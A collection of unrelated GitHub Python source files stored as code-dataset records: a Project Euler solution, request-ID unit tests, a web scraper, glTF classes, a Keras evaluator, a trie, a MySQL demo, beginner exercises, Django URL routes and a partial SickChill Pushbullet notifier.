","repo_name":"jirvingphd/fsds_100719_cohort_notes","sub_path":"py_files/StatsFactory.py","file_name":"StatsFactory.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"28868193188","text":"def g(m, n):\n grid = [-1 for x in range(n + 1)]\n \n def f(m, n):\n if grid[n] != -1:\n return grid[n]\n elif n < m:\n grid[n] = 1\n return grid[n]\n else:\n result = f(m, n - 1)\n for i in range(m, n + 1):\n result += f(m, n - i - 1)\n grid[n] = result\n return grid[n]\n \n return f(m, n)\n\nprint (g(3, 50))\n","repo_name":"g-d-l/project_euler","sub_path":"done/114.py","file_name":"114.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71077948588","text":"from tests.classes import TestBase\nfrom datetime import datetime\nfrom uuid import uuid4\nimport re\n\n\nREQUEST_ID_REGEXP = re.compile('^[0-9]{10},[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89ab][a-f0-9]{3}-[a-f0-9]{12}\\Z', re.I)\n\n\ndef checkRequestId(requestId):\n\n match = REQUEST_ID_REGEXP.match(requestId)\n return match is not None\n\n\nclass TestRequestId(TestBase):\n \"\"\"\n Test getVersion\n \"\"\"\n def test_server_requestid(self):\n \"\"\"\n :description: Getting the version to check requestId with no requestId in request\n :resources: '/version'\n \"\"\"\n reply = self.FacesApi.getVersion()\n self.assertTrue(checkRequestId(reply.headers['Luna-Request-Id']))\n\n def test_badformat_requestid(self):\n \"\"\"\n :description: Getting the version to check requestId with bad format requestId in request\n :resources: '/version'\n 
\"\"\"\n requestId = 'bad format request id'\n reply = self.FacesApi.getVersion(lunaRequestId=requestId)\n self.assertTrue(checkRequestId(reply.headers['Luna-Request-Id']))\n\n def test_requestid(self):\n \"\"\"\n :description: Getting the version to check requestId\n :resources: '/version'\n \"\"\"\n requestId = str(int(datetime.timestamp(datetime.now()))) + ',' + str(uuid4())\n reply = self.FacesApi.getVersion(lunaRequestId=requestId)\n self.assertEqual(requestId, reply.headers['Luna-Request-Id'])\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-faces/tests/unittests_request_id.py","file_name":"unittests_request_id.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15525311613","text":"\"\"\"\nGet the list of Codewars Leaderboard score (aka Honor) in descending order\n\nNote:\nif it was the bad timing, the data could be updated during your test cases.\nTry several times if you had such experience.\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport http.client\nURL = 'https://www.codewars.com/users/leaderboard'\n\ndef connect():\n page = urllib.request.urlopen(URL)\n data = http.client.HTTPResponse.read(page)\n soup = BeautifulSoup(data, 'html.parser')\n return soup.body\n\ndef get_leaderboard_honor():\n body = connect()\n table_rows = body.find('div', attrs={'class':'leaderboard pan'}).find('table').find_all(\"tr\")\n honor_list = []\n for i in range(1, len(table_rows)):\n curr_row = table_rows[i]\n row_data = curr_row.find_all('td')\n honor = (int)(row_data[3].get_text())\n honor_list.append(honor)\n return honor_list \n \n","repo_name":"Manish-Giri/Codewars","sub_path":"Python/codewars-leaderboard.py","file_name":"codewars-leaderboard.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"40573757779","text":"import enum\n\n# https://github.com/KhronosGroup/glTF/tree/master/specification/1.0\n\n# Uniform Semantics:\n# LOCAL, MODEL, VIEW, PROJECTION, ...\n\nclass Uniform(enum.Enum):\n LOCAL = \"LOCAL\"\n MODEL = \"MODEL\"\n VIEW = \"VIEW\"\n PROJECTION = \"PROJECTION\"\n\n# Attribute Semantics:\n# POSITION, NORMAL, TEXCOORD_0, TEXCOORD_1, COLOR, JOINT, WEIGHT\n\nclass Attribute(enum.Enum):\n POSITION = \"POSITION\"\n NORMAL = \"NORMAL\"\n TEXCOORD = \"TEXCOORD\"\n TEXCOORD_0 = \"TEXCOORD_0\"\n TEXCOORD_1 = \"TEXCOORD_1\"\n COLOR = \"COLOR\"\n JOINT = \"JOINT\"\n WEIGHT = \"WEIGHT\"\n\n# Accessor Types:\n# SCALAR, VEC2, VEC3, VEC4, MAT2, MAT3, MAT4\n\nclass AccessorType(enum.Enum):\n SCALAR = \"SCALAR\"\n VEC2 = \"VEC2\"\n VEC3 = \"VEC3\"\n VEC4 = \"VEC4\"\n MAT2 = \"MAT2\"\n MAT3 = \"MAT3\"\n MAT4 = \"MAT4\"\n\n# Component Types:\n# SCALAR, VEC2, VEC3, VEC4, MAT2, MAT3, MAT4\n\nclass ComponentType(enum.Enum):\n BYTE = 5120\n UNSIGNED_BYTE = 5121\n SHORT = 5122\n UNSIGNED_SHORT = 5123\n FLOAT = 5126\n\nclass BufferTarget(enum.Enum):\n ARRAY_BUFFER = 34962\n ELEMENT_ARRAY_BUFFER = 34963\n\nclass PrimitiveMode(enum.Enum):\n POINTS = 0\n LINES = 1\n LINE_LOOP = 2\n LINE_STRIP = 3\n TRIANGLES = 4\n TRIANGLE_STRIP = 5\n TRIANGLE_FAN = 6\n\ndef askey(name):\n return name.replace(\" \", \"_\").lower()\n\n\nclass Document(object):\n @classmethod\n def from_mesh(cls, mesh, material=None):\n node = Node(\"Default Node\", meshes=[mesh])\n scene = Scene(\"Default Scene\", nodes=[node])\n \n materials = {} if material is None else {material.key: material}\n meshes = 
{} if mesh is None else {mesh.key: mesh}\n nodes = {node.key: node}\n scenes = {scene.key: scene}\n \n return cls(materials=materials, meshes=meshes, nodes=nodes, scenes=scenes, scene=scene)\n \n @classmethod\n def from_meshes(cls, meshes, materials=None):\n meshes = [] if meshes is None else meshes\n materials = [] if materials is None else materials\n \n node = Node(\"Default Node\", meshes=meshes)\n scene = Scene(\"Default Scene\", nodes=[node])\n \n materials = {material.key: material for material in materials}\n meshes = {mesh.key: mesh for mesh in meshes}\n nodes = {node.key: node}\n scenes = {scene.key: scene}\n \n return cls(materials=materials, meshes=meshes, nodes=nodes, scenes=scenes, scene=scene)\n \n def __init__(self, *args, **kwargs):\n self.asset = {\"version\": \"1.0\"}\n self.scene = kwargs.get('scene', None)\n self.scenes = kwargs.get('scenes', {})\n self.nodes = kwargs.get('nodes', {})\n self.meshes = kwargs.get('meshes', {})\n self.materials = kwargs.get('materials', {})\n self.accessors = kwargs.get('accessors', {})\n self.buffer_views = kwargs.get('buffer_views', {})\n self.buffers = kwargs.get('buffers', {})\n \n def add_scene(self, value):\n self.scenes[value.key] = value\n def add_node(self, value):\n self.nodes[value.key] = value\n def add_mesh(self, value):\n self.meshes[value.key] = value\n def add_material(self, value):\n self.materials[value.key] = value\n def add_accessor(self, value):\n self.accessors[value.key] = value\n def add_buffer_view(self, value):\n self.buffer_views[value.key] = value\n def add_buffer(self, value):\n self.buffers[value.key] = value\n \n def togltf(self):\n return {\n \"buffers\": {key: buffer.togltf() for key, buffer in self.buffers.items()},\n \"bufferViews\": {key: buffer_view.togltf() for key, buffer_view in self.buffer_views.items()},\n \"accessors\": {key: accessor.togltf() for key, accessor in self.accessors.items()},\n \"materials\": {key: material.togltf() for key, material in self.materials.items()},\n \"meshes\": {key: mesh.togltf() for key, mesh in self.meshes.items()},\n \"nodes\": {key: node.togltf() for key, node in self.nodes.items()},\n \"scenes\": {key: scene.togltf() for key, scene in self.scenes.items()},\n \"scene\": self.scene.key,\n \"asset\": self.asset,\n }\n\nclass Scene(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name, *args, **kwargs):\n self.name = name\n self.nodes = kwargs.get('nodes', [])\n def togltf(self):\n return {\n \"name\": self.name,\n \"nodes\": [node.key for node in self.nodes],\n }\n\nclass Node(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name, *args, **kwargs):\n self.name = name\n # 4x4 identity transform (row-major); a trailing comma here would wrap the list in a tuple\n self.matrix = [\n 1, 0, 0, 0,\n 0, 1, 0, 0,\n 0, 0, 1, 0,\n 0, 0, 0, 1\n ]\n self.meshes = kwargs.get('meshes', [])\n self.children = kwargs.get('children', [])\n def togltf(self):\n return {\n \"name\": self.name,\n \"matrix\": self.matrix,\n \"meshes\": [mesh.key for mesh in self.meshes],\n \"children\": [child.key for child in self.children],\n }\n\nclass Accessor(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name, bufferView, byteOffset = 0, byteStride = 0, count = 0, type = AccessorType.SCALAR, componentType = ComponentType.FLOAT):\n self.name = name\n self.type = type\n self.componentType = componentType\n self.bufferView = bufferView\n self.byteOffset = byteOffset\n self.byteStride = byteStride\n self.count = count\n self.max = None\n self.min = None\n def togltf(self):\n return {\n
#\"name\": self.name,\n \"bufferView\": self.bufferView.key,\n \"byteOffset\": self.byteOffset,\n \"byteStride\": self.byteStride,\n \"componentType\": self.componentType.value,\n \"count\": self.count,\n \"type\": self.type.value,\n #\"max\": self.max,\n #\"min\": self.min,\n }\n\nclass BufferView(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name, buffer, byteOffset=0, byteLength=0, target=BufferTarget.ARRAY_BUFFER):\n self.name = name\n self.buffer = buffer\n self.byteOffset = byteOffset\n self.byteLength = byteLength\n self.target = target\n def togltf(self):\n return {\n #\"name\": self.name,\n \"buffer\": self.buffer.key,\n \"byteOffset\": self.byteOffset,\n \"byteLength\": self.byteLength,\n \"target\": self.target.value,\n }\n\nclass Buffer(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name, uri, byteLength=0, type=\"arraybuffer\"):\n self.name = name\n self.uri = uri\n self.byteLength = byteLength\n self.type = type\n def togltf(self):\n return {\n #\"name\": self.name,\n \"uri\": self.uri,\n \"byteLength\": self.byteLength,\n \"type\": self.type,\n }\n\nclass Primitive(object):\n def __init__(self, attributes, indices, material, mode=PrimitiveMode.TRIANGLES, targets=None):\n self.attributes = attributes\n self.indices = indices\n self.material = material\n self.mode = mode\n self.targets = targets\n def togltf(self):\n result = {\n \"attributes\": {key.value: attribute.key for key, attribute in self.attributes.items()},\n }\n if self.indices:\n result[\"indices\"] = self.indices.key\n if self.material:\n result[\"material\"] = self.material.key\n if self.mode:\n result[\"mode\"] = self.mode.value\n #if self.targets:\n # result[\"targets\"] = self.targets\n return result\n\nclass Mesh(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name, primitives = None):\n self.name = name\n self.primitives = [] if primitives is None else primitives \n def togltf(self):\n return {\n \"name\": self.name,\n \"primitives\": [primitive.togltf() for primitive in self.primitives]\n }\n\nclass Material(object):\n @property\n def key(self):\n return askey(self.name)\n def __init__(self, name):\n self.name = name\n self.values = {\n \"ambient\": [0.0, 0.0, 0.0, 1],\n \"diffuse\": [0.0, 0.0, 0.0, 1],\n \"specular\": [0.0, 0.0, 0.0, 1],\n \"emission\": [0.0, 0.0, 0.0, 1],\n \"shininess\": 256\n }\n def __setitem__(self, key, item):\n self.values[key] = item\n def __getitem__(self, key):\n return self.values[key]\n def togltf(self):\n return {\n \"name\": self.name,\n \"values\": self.values,\n }","repo_name":"filonik/pygltf","sub_path":"pygltf/gltf1.py","file_name":"gltf1.py","file_ext":"py","file_size_in_byte":9128,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"69837946347","text":"from keras.models import load_model\nfrom tkinter.filedialog import askopenfilename, askdirectory\nfrom keras.preprocessing.image import ImageDataGenerator\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score\n\ndef __get_image_generator():\n test_datagen = ImageDataGenerator()\n test_set = test_datagen.flow_from_directory('images/test',\n batch_size=50,\n target_size=(200,200))\n \n return test_set\n\nmodel_path = askopenfilename()\nmodel = load_model(model_path)\ngenerator = __get_image_generator()\n\ncount = 0\nacc = []\nfor i in range(30):\n loss, a = model.evaluate_generator(generator, steps=25)\n acc.append(a)\n count += 1\n 
print(count)\n\ndf = pd.DataFrame({'val_acc': acc})\ndf.to_csv('val_acc_best.csv')","repo_name":"augustsemrau/02461-IntelligentSystems_ExamProject_CNN_January2019","sub_path":"evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71268884267","text":"\nclass Solution:\n def deleteNode(self, node):\n \"\"\"\n :type node: ListNode\n :rtype: void Do not return anything, modify node in-place instead.\n \"\"\"\n temp = node.next\n node.val = temp.val\n node.next = temp.next\n","repo_name":"BeamlakTesfahun/Competitive-Programming","sub_path":"Delete_Node_in_Linked_List.py","file_name":"Delete_Node_in_Linked_List.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"42256398601","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDefinition of urls for DjangoWebProject.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.conf.urls import url\nimport django.contrib.auth.views\nimport DjangoWebProject.settings\nfrom django.contrib import auth\nimport app\nfrom app.views import *\nfrom app.project import *\n\n# Uncomment the next lines to enable the admin:\nfrom django.conf.urls import include\nfrom django.contrib import admin\nfrom DjangoWebProject import settings\nadmin.autodiscover()\n\nurlpatterns = [\n #url(r'/(?P.*)','django.views.static.serve',{'document_root':settings.STATIC_ROOT+'/images'}), \n url(r'^$', home, name='home'),\n url(r'^contact$', contact, name='contact'),\n url(r'^about', about, name='about'),\n url(r'^login/$',\n django.contrib.auth.views.login,\n {\n 'template_name': 'app/login2.html',\n 'authentication_form': app.forms.BootstrapAuthenticationForm,\n },\n name='login'),\n url(r'^logout$',django.contrib.auth.views.logout,{'next_page': '/',},name='logout'),\n url(r'^register/$',register),\n url(r'^search_form/$',search_form),\n url(r'^search/$',search),\n url(r'^reset',reset),\n url(r'^changepassword/(?P\w+)/$',changepassword), \n\n url(r'^student/papers$',papers),\n\n\n\n url(r'^test',test),\n\n url(r'^complete/$',ShowComplete,name='complete'),\n url(r'^complete/(?P\w+)$',ShowComplete,name='complete'),\n url(r'^studentIndex/(?P\w+)$',ProjectIndex),\n url(r'^first/$',first),\n url(r'^copy/$',shit),\n\n url(r'^add/(?P\w+)/(?P\w+)$',LinkAdd),\n url(r'^add/(?P\w+)/(?P\w+)/(?P\w+)$',LinkAdd),\n url(r'^create/(?P\w+)$',ProjectCreate,name = 'create'),\n url(r'^Index/$',ProjectIndex,name = 'project'),\n url(r'^Index/(?P\w+)$',ProjectIndex),\n url(r'^check/(?P\w+)$',ProjectCheck),\n url(r'^check/(?P\w+)/(?P\w+)$',ProjectCheck),\n url(r'^Check/(?P\w+)$',ProjectCheck),\n url(r'^Check/(?P\w+)/(?P\w+)$',ProjectCheck),\n url(r'^delete/(?P\w+)$',ProjectDelete),\n url(r'^detail/(?P\w+)$',ProjectDetail),\n url(r'^Detail/(?P\w+)$',ProjectDetail),\n url(r'^Add/(?P\w+)/(?P\w+)$',ProjectAdd),\n\n url(r'^construction/$',construction,name='construction'), \n url(r'^excel/$',Excel),\n #C:\Users\Administrator\Source\Repos\SITE-database\DjangoWebProject\DjangoWebProject\app\static\images\n \n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n\n url(r'^i18n/', 
include('django.conf.urls.i18n')),\n]\n","repo_name":"kaleid0scope/SITE-database","sub_path":"DjangoWebProject/DjangoWebProject/DjangoWebProject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36652437177","text":"# Medium\n# https://leetcode.com/problems/implement-trie-prefix-tree/\nclass TrieNode:\n def __init__(self, text='', isWord=False):\n self.text = text\n self.children = {}\n self.isWord = isWord\n\nclass Trie:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.root = TrieNode()\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie.\n \"\"\"\n curr = self.root\n for letter in word:\n if letter not in curr.children:\n curr.children[letter] = TrieNode(letter)\n curr = curr.children[letter]\n curr.isWord = True\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the trie.\n \"\"\"\n curr = self.root\n for letter in word:\n if letter not in curr.children:\n return False\n curr = curr.children[letter]\n return curr.isWord\n\n def startsWith(self, prefix: str) -> bool:\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n \"\"\"\n curr = self.root\n for letter in prefix:\n if letter not in curr.children:\n return False\n curr = curr.children[letter]\n \n if curr.children or curr.isWord:\n return True \n return False\n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)","repo_name":"EnigmaCodex-ACE/StudentCodeSnippets","sub_path":"Leetcode-Solutions/Strings/208. Implement Prefix Trie.py","file_name":"208. 
Implement Prefix Trie.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9160349343","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n#author:Alicehuang\n\nimport pymysql\n# Open the database connection\ndb=pymysql.connect(host='192.168.4.50',port=3306,user='root',password='123456',db='school')\n\n# Get a cursor object\ncursor = db.cursor()\n\n# Run a SQL statement\nsql_select= \"select version()\"\ncursor.execute(sql_select)\n\n# Fetch the server version\ndata = cursor.fetchone()\nprint(\"DB version is : %s\" %data)\n\n# Drop the table if it already exists\ncursor.execute(\"drop table if exists class\")\n\n# Create the table\nsql_create=\"create table class(class_id INT PRIMARY KEY auto_increment,class CHAR(10),FOREIGN KEY(class_id) REFERENCES student(student_id) ON UPDATE CASCADE ON DELETE CASCADE )engine = innodb charset = utf8\"\ncursor.execute(sql_create)\n# Insert a row\nsql_insert= '''insert into class(class) values(\"三年级三班\")'''\ntry:\n cursor.execute(sql_insert)\n db.commit()\nexcept:\n db.rollback()\n\n\n# Query the table\nsql_select= '''select * from class'''\ntry:\n cursor.execute(sql_select)\n # Fetch all records\n result = cursor.fetchall()\n for row in result:\n id = row[0]\n name = row[1]\n print (\"id = %d,name=%s\" %(id,name))\nexcept:\n print(\"Error:unable to fetch data\")\n\n\n# try:\n# cursor.execute(sql_insert)\n# db.commit()\n# except:\n# db.rollback()\n\nprint(\"end\")\ndb.commit()\ncursor.close()\ndb.close()\n","repo_name":"Alicebat/-Python","sub_path":"database/data_class.py","file_name":"data_class.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70940654508","text":"import json\n\n\n\"\"\"\n    Tic Tac Toe Review\n\n    You know lists? Use them :)\n\"\"\"\n\nusers = [\"Joe\", \"Fred\"]\nmarks = [\"X\", \"O\"]\nboard = ['', '', '', '', '', '', '', '', '']\nturns = 0\n\nwhile turns < 9:\n # We can simulate 2 players using modulo math, get an index and then use\n # that with users/marks\n current_index = turns % 2\n\n print(\"Player {} with mark {} it's your turn\".format(\n users[current_index],\n marks[current_index]\n )\n )\n board[turns] = marks[current_index]\n print(board)\n turns += 1\n\nprint(\"Game hit 9 turns\")\n\n#quit()\n\nprint(\"\\nSIMPLE DICTIONARY\\n\")\n\n# Create one\nsimple_dict = {}\n\n# You add to it by simply referencing a location\nsimple_dict[\"name\"] = \"Mr. Grecoe\"\nprint(simple_dict[\"name\"])\n\n# Iterate over the dictionary using keys\nfor key in simple_dict.keys():\n print(\"Key = {}, Value = {}\".format(key, simple_dict[key]))\n\n# Remove using pop or delete\n# Pop allows you to pop a key IF PRESENT or return a default value. If present\n# you get the stored value.\npop_res = simple_dict.pop(\"foo\", None)\nprint(\"POP MISSING KEY RESULT ->\", pop_res)\n\n# Delete the key MUST exist, if it doesn't you will get an exception (unlike pop)\ndel simple_dict[\"name\"]\nprint(\"AFTER DELETE ->\", simple_dict)\n\n#quit()\n\n\n\"\"\"\n    Word counter using a dictionary.\n\n    key = word, value = count (# of times it's been seen)\n\n    String can be broken up using split()\n\"\"\"\n\nprint(\"\\nWORD COUNTER\\n\")\nparagraph = \"\"\"Last season, Nico Hulkenberg made a dramatic return to F1 in place of Sergio Perez and then Lance Stroll, while George Russell stepped in for Lewis Hamilton late on. 
As a result, Albon is staying sharp in case he's needed this season if Max Verstappen, Yuki Tsunoda, Perez or Pierre Gasly can't race for any reason.\"\"\"\n\ntotal_words = 0\nfound_words = {}\n# Break up \"paragraph\" into separate words.\nbreak_down = paragraph.split(' ')\nfor word in break_down:\n total_words += 1\n\n # Strip off any periods and make lower case for checking\n cur_word = word.strip('.').lower()\n\n # If it's not in our dict, add it, otherwise increment count.\n if cur_word not in found_words:\n found_words[cur_word] = 1\n else:\n found_words[cur_word] += 1\n\n# Print out some context (how many total, how many unique)\nprint(\"TOTAL WORDS:\", total_words, \"UNIQUE WORDS:\", len(found_words))\nprint(\"ALL FOUND WORDS:\\n\", found_words)\n\n# Go through and just pop each one off\nfor w in list(found_words.keys()):\n found_words.pop(w)\n\n# Now our dictionary is empty\nprint(\"CLEANED DICT LEN:\", len(found_words))\n\nquit()\n\n\n\n\n\n\n\n","repo_name":"grecoe/teals","sub_path":"dictionaryex.py","file_name":"dictionaryex.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17455026216","text":"# Create a function named zbadajTrojkat() that takes the side lengths of a triangle as arguments.\n# The function should report whether the triangle is right-angled, isosceles, equilateral, scalene or invalid.\nimport math\nwhile True:\n\tdef zbadajTrojkat(a, b, c):\n\t\t\t# strict inequalities: a degenerate (flat) triangle is not valid\n\t\t\tif a + b > c and b + c > a and c + a > b:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\tdef typ_trojkata(a, b, c):\n\t\tif a == b and b == c:\n\t\t\tprint('The triangle is equilateral.')\n\t\telif a == b or b == c or a == c:\n\t\t\tprint('The triangle is isosceles.')\n\t\t# compare with isclose() rather than ==, since sqrt() results are floats\n\t\telif math.isclose(c, math.sqrt(a ** 2 + b ** 2)) or math.isclose(b, math.sqrt(a ** 2 + c ** 2)) or math.isclose(a, math.sqrt(b ** 2 + c ** 2)):\n\t\t\tprint('The triangle is right-angled.')\n\t\telse:\n\t\t\tprint('The triangle is scalene.')\n\n\tbok_a = float(input('Enter the length of side A: '))\n\tbok_b = float(input('Enter the length of side B: '))\n\tbok_c = float(input('Enter the length of side C: '))\n\n\tif zbadajTrojkat(bok_a, bok_b, bok_c):\n\t\ttyp_trojkata(bok_a, bok_b, bok_c)\n\telse:\n\t\tprint('A triangle cannot be formed from the given values.')","repo_name":"Mardmoo/ISA-Bootcamp_zadania-domowe","sub_path":"Zjazd_2/praca_domowa_zjazd2_2.py","file_name":"praca_domowa_zjazd2_2.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21702202653","text":"from Elements.Node import Node\nfrom Elements.Connector import *\nfrom vpython import *\n\n\nclass Tensegrity:\n def __init__(self, nodes=None):\n self.nodes = []\n if nodes is not None:\n self.add_nodes(nodes)\n\n\n def add_nodes(self, nodes):\n if type(nodes) is Node and nodes not in self.nodes:\n self.nodes.append(nodes)\n elif type(nodes) is list and all(isinstance(e, Node) for e in nodes):\n [self.add_nodes(n) for n in nodes]\n\n def set_connections(self, connections):\n for i in range(len(self.nodes)):\n for j in range(i, len(connections[i])):\n if connections[i][j] == 1:\n self.nodes[i].add_strut(self.nodes[j])\n elif connections[i][j] == 2:\n self.nodes[i].add_tendon(self.nodes[j])\n\n def build_vpython_tensegrity(self):\n elements = []\n for node in self.nodes:\n for other in node.tendons:\n T = Tendon(node, other)\n if T not in elements:\n elements.append(T)\n for other in node.struts:\n S = Strut(node, other)\n if S 
not in elements:\n elements.append(S)\n return [_.get_vpython_element() for _ in elements]\n","repo_name":"PatrickPitts/Tensegrity","sub_path":"Elements/Tensegrity.py","file_name":"Tensegrity.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70037467626","text":"from django.shortcuts import render,get_object_or_404, redirect\n\nfrom django.contrib.auth.decorators import permission_required\nfrom django.contrib.auth.models import User\n\nfrom avaliacoes.models import Avaliacao, Criterio\nfrom avaliacoes.forms import AvaliacaoForm\n\nfrom core import views\n\ndef avaliacao_realizada(request):\n\treturn render(request,'avaliacao-realizada.html')\n\n@permission_required('avaliacoes.view_avaliacao', login_url=views.autorizacao_negada)\ndef listar_avaliacoes(request): \n    avaliacoes = Avaliacao.objects.all()\n    template_name = 'listar-avaliacoes.html'\n    context = {\n 'avaliacoes': avaliacoes,\n }\n    return render(request, template_name, context)\n\n@permission_required('avaliacoes.add_avaliacao', login_url=views.autorizacao_negada)\ndef minha_avaliacao(request): \n    avaliacao = Avaliacao.objects.filter(avaliador=request.user)\n    template_name = 'minha-avaliacao.html'\n    context = {\n 'avaliacao': avaliacao,\n }\n    return render(request, template_name, context)\n\n\n@permission_required('avaliacoes.add_avaliacao', login_url=views.autorizacao_negada)\ndef avaliar_criterio(request):\n\tcontext = {}\n\ttemplate_name = 'avaliar.html'\n\tuser = User.objects.get(id=request.user.id)\n\tverificar_usuario = Avaliacao.objects.filter(avaliador=user)\n\tif verificar_usuario.exists():\n\t\treturn redirect(avaliacao_realizada) # If the user already has one, an evaluation has already been submitted.\n\tif request.method == 'POST':\n\t\tform = AvaliacaoForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tuser = form.save(commit=False)\n\t\t\tuser.avaliador = request.user\n\t\t\tuser.save()\n\t\t\treturn redirect(listar_avaliacoes)\n\telse:\n\t\tform = AvaliacaoForm()\n\tcontext['form'] = form\n\treturn render(request, template_name, context)\n'''\n\ndef avaliar_criterio(request):\n\tcontext = {}\n\ttemplate_name = 'avaliar.html'\n\tif request.user.is_authenticated:\n\t\tuser = User.objects.get(id=request.user.id)\n\t\tif request.method == 'POST':\n\t\t\tform = AvaliacaoForm(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\tuser = form.save(commit=False)\n\t\t\t\tuser.avaliador = request.user\n\t\t\t\tuser.save()\n\t\t\t\treturn redirect(listar_avaliacoes)\n\t\telse:\n\t\t\tform = AvaliacaoForm()\n\telse:\n\t\tif request.method == 'POST':\n\t\t\tform = AvaliacaoForm(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\tuser = form.save()\n\t\t\t\tuser.save()\n\t\t\t\treturn redirect(listar_avaliacoes)\n\t\telse:\n\t\t\tform = AvaliacaoForm()\n\tcontext['form'] = form\n\treturn render(request, template_name, context)\n'''\n\n\n","repo_name":"Glaysonvisgueira/academia","sub_path":"avaliacoes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13089581238","text":"from urllib.parse import urljoin\n\nfrom requests.structures import CaseInsensitiveDict\n\nfrom sickchill import logger, settings\nfrom sickchill.oldbeard import common, helpers\nfrom sickchill.oldbeard.classes import UIError\n\n\nclass Notifier(object):\n    def __init__(self):\n        self.session = helpers.make_session()\n        self.url = 
\"https://api.pushbullet.com/v2/\"\n\n def test_notify(self, pushbullet_api):\n logger.debug(\"Sending a test Pushbullet notification.\")\n return self._sendPushbullet(pushbullet_api, event=\"Test\", message=\"Testing Pushbullet settings from SickChill\", force=True)\n\n def get_devices(self, pushbullet_api):\n logger.debug(\"Testing Pushbullet authentication and retrieving the device list.\")\n headers = CaseInsensitiveDict({\"Access-Token\": pushbullet_api})\n return helpers.getURL(urljoin(self.url, \"devices\"), session=self.session, headers=headers, returns=\"text\") or {}\n\n def get_channels(self, pushbullet_api):\n \"\"\"Fetches the list of channels a given access key has permissions to push to\"\"\"\n logger.debug(\"Testing Pushbullet authentication and retrieving the device list.\")\n headers = CaseInsensitiveDict({\"Access-Token\": pushbullet_api})\n return helpers.getURL(urljoin(self.url, \"channels\"), session=self.session, headers=headers, returns=\"text\") or {}\n\n def notify_snatch(self, ep_name):\n if settings.PUSHBULLET_NOTIFY_ONSNATCH:\n self._sendPushbullet(pushbullet_api=None, event=common.notifyStrings[common.NOTIFY_SNATCH] + \" : \" + ep_name, message=ep_name)\n\n def notify_download(self, ep_name):\n if settings.PUSHBULLET_NOTIFY_ONDOWNLOAD:\n self._sendPushbullet(pushbullet_api=None, event=common.notifyStrings[common.NOTIFY_DOWNLOAD] + \" : \" + ep_name, message=ep_name)\n\n def notify_subtitle_download(self, ep_name, lang):\n if settings.PUSHBULLET_NOTIFY_ONSUBTITLEDOWNLOAD:\n self._sendPushbullet(\n pushbullet_api=None, event=common.notifyStrings[common.NOTIFY_SUBTITLE_DOWNLOAD] + \" : \" + ep_name + \" : \" + lang, message=ep_name + \": \" + lang\n )\n\n def notify_update(self, new_version=\"??\"):\n self._sendPushbullet(\n pushbullet_api=None,\n event=common.notifyStrings[common.NOTIFY_UPDATE],\n message=common.notifyStrings[common.NOTIFY_UPDATE_TEXT] + new_version,\n # link=link\n )\n\n def notify_login(self, ipaddress=\"\"):\n self._sendPushbullet(\n pushbullet_api=None, event=common.notifyStrings[common.NOTIFY_LOGIN], message=common.notifyStrings[common.NOTIFY_LOGIN_TEXT].format(ipaddress)\n )\n\n def notify_logged_error(self, ui_error: UIError):\n 